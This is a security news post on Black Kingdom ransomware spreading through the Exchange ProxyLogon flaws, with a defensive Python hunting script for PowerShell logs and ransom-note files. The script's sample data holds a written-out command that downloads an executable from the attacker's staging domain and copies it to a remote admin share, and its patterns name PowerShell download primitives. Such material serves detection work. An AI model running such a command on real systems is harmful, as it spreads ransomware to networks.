Black Kingdom ransomware is now being deployed through the Microsoft Exchange Server ProxyLogon vulnerabilities. Marcus Hutchins of MalwareTechBlog reported that a threat actor was compromising Microsoft Exchange servers via ProxyLogon and using that access to deploy ransomware.
According to Hutchins, the threat actor uses the vulnerability to execute a PowerShell script that downloads the ransomware executable from ‘yuuuuu44[.]com’ and then pushes it out to other computers on the network.
Victims of this Black Kingdom campaign reported so far are located in the USA, Canada, Austria, Switzerland, Russia, France, Israel, the United Kingdom, Italy, Germany, Greece, Australia, and Croatia.
When it runs on a device, the ransomware encrypts files, giving each a random extension, and then drops a ransom note named decrypt_file.TxT, as shown below. Hutchins reports that he has also seen a ransom note named ReadMe.txt with slightly different text.
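The two observable artifacts described above, the PowerShell downloader that fetches the payload from yuuuuu44[.]com and spreads it, and the ransom notes dropped next to files with random extensions, are enough to build a small hunt. The script below is an added example written for this page; it is not code from the article, from Hutchins, or from the attacker. It applies the published indicators (the staging domain and the two ransom-note names) to PowerShell Script Block Logging records (Event ID 4104) and to a file listing. The download-primitive and admin-share patterns, the random-extension heuristic, the "common extensions" list, and all sample events and paths are constructed assumptions for illustration, not details from the report.

```python
import re
from collections import Counter, defaultdict
from pathlib import PureWindowsPath

# Indicators stated in the article: staging domain and ransom-note file names.
DOWNLOAD_DOMAIN = "yuuuuu44.com"
RANSOM_NOTE_NAMES = {"decrypt_file.txt", "readme.txt"}

# Assumptions, not from the article: generic PowerShell download/execute primitives
# and UNC admin-share paths that a "push it to other computers" step might use.
DOWNLOAD_RE = re.compile(
    r"Invoke-WebRequest|\biwr\b|\bwget\b|\bcurl\b|DownloadFile|DownloadString"
    r"|Net\.WebClient|Start-BitsTransfer|Invoke-Expression|\biex\b",
    re.IGNORECASE,
)
ADMIN_SHARE_RE = re.compile(r"\\\\[\w.-]+\\(?:c|admin)\$", re.IGNORECASE)
# Assumed allow-list so normal program directories do not look "randomly renamed".
COMMON_EXTS = {".exe", ".dll", ".txt", ".docx", ".xlsx", ".pdf", ".jpg", ".png", ".log"}


def refang(text):
    """Undo common IOC defanging so 'hxxp://yuuuuu44[.]com' matches a real script."""
    return text.replace("[.]", ".").replace("hxxp", "http")


def scan_script_block(event_id, script_text):
    """Score one 4104 script-block record; returns every reason it looks like the downloader."""
    text = refang(script_text)
    reasons = []
    if DOWNLOAD_DOMAIN in text.lower():
        reasons.append(f"contacts known staging domain {DOWNLOAD_DOMAIN}")
    if DOWNLOAD_RE.search(text) and re.search(r"https?://", text, re.IGNORECASE):
        reasons.append("downloads or executes content from a URL")
    if ADMIN_SHARE_RE.search(text):
        reasons.append("writes to a remote admin share (possible lateral push)")
    return {"event": event_id, "reasons": reasons}


def scan_paths(paths):
    """Find directories holding a ransom note and count sibling files with one-off extensions."""
    by_dir = defaultdict(list)
    for p in paths:
        wp = PureWindowsPath(p)
        by_dir[str(wp.parent).lower()].append(wp.name)
    hits = []
    for directory, names in by_dir.items():
        notes = [n for n in names if n.lower() in RANSOM_NOTE_NAMES]
        if not notes:  # ReadMe.txt is common; only the note itself is not enough
            continue
        others = [n for n in names if n.lower() not in RANSOM_NOTE_NAMES]
        ext_counts = Counter(PureWindowsPath(n).suffix.lower() for n in others)
        ext_counts.pop("", None)
        # Heuristic (assumption): random per-file extensions show up as many
        # extensions that each occur once and are not well-known types.
        random_exts = [e for e, c in ext_counts.items() if c == 1 and e not in COMMON_EXTS]
        verdict = "likely encrypted" if random_exts else "review"
        hits.append({"dir": directory, "notes": notes,
                     "random_ext_files": len(random_exts), "verdict": verdict})
    return hits


# Constructed sample telemetry (not real logs): one benign block, one that matches the
# described behaviour, and one internal download that should score lower.
SAMPLE_SCRIPT_BLOCKS = [
    (4104, "Get-Process | Where-Object { $_.CPU -gt 100 }"),
    (4104, "(New-Object Net.WebClient).DownloadFile('http://yuuuuu44.com/x.exe',"
           "'C:\\Windows\\Temp\\x.exe'); Copy-Item C:\\Windows\\Temp\\x.exe "
           "\\\\SRV02\\C$\\Windows\\Temp\\x.exe"),
    (4104, "Invoke-WebRequest https://intranet.example.local/agent.msi -OutFile agent.msi"),
]
# Constructed file listing: one encrypted user folder, one ordinary program folder.
SAMPLE_PATHS = [
    r"C:\Users\bob\Documents\decrypt_file.TxT",
    r"C:\Users\bob\Documents\budget.xlsx.k9Zq2",
    r"C:\Users\bob\Documents\notes.docx.Pt7Xa",
    r"C:\Users\bob\Documents\photo.jpg.Rm3Qe",
    r"C:\Program Files\Tool\ReadMe.txt",
    r"C:\Program Files\Tool\tool.exe",
    r"C:\Program Files\Tool\tool.dll",
]


def run_hunt(blocks=SAMPLE_SCRIPT_BLOCKS, paths=SAMPLE_PATHS):
    """Run both scans and return only the records worth an analyst's attention."""
    script_hits = [r for i, (eid, txt) in enumerate(blocks, 1)
                   for r in [scan_script_block(i, txt)] if r["reasons"]]
    return {"script_blocks": script_hits, "directories": scan_paths(paths)}


if __name__ == "__main__":
    for hit in run_hunt()["script_blocks"]:
        print("script block", hit["event"], "->", "; ".join(hit["reasons"]))
    for hit in run_hunt()["directories"]:
        print(hit["dir"], "->", hit["verdict"], f"({hit['random_ext_files']} renamed files)")
```

On a live host, the script-block text would come from Get-WinEvent on the Microsoft-Windows-PowerShell/Operational log, and the file listing from the shares the Exchange server can reach; the domain match is the high-confidence signal, while the download and admin-share patterns are generic and will also fire on legitimate administration, so treat them as triage context rather than a verdict on their own.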
Black Kingdom is not new: in June 2020 it was deployed by exploiting a Pulse Secure VPN vulnerability. Hutchins notes that the current ransomware executable is a Python script compiled into a Windows executable.
Emsisoft may be able to help recover files encrypted by recent Black Kingdom ransomware; victims should keep the encrypted files and the ransom note intact before seeking assistance.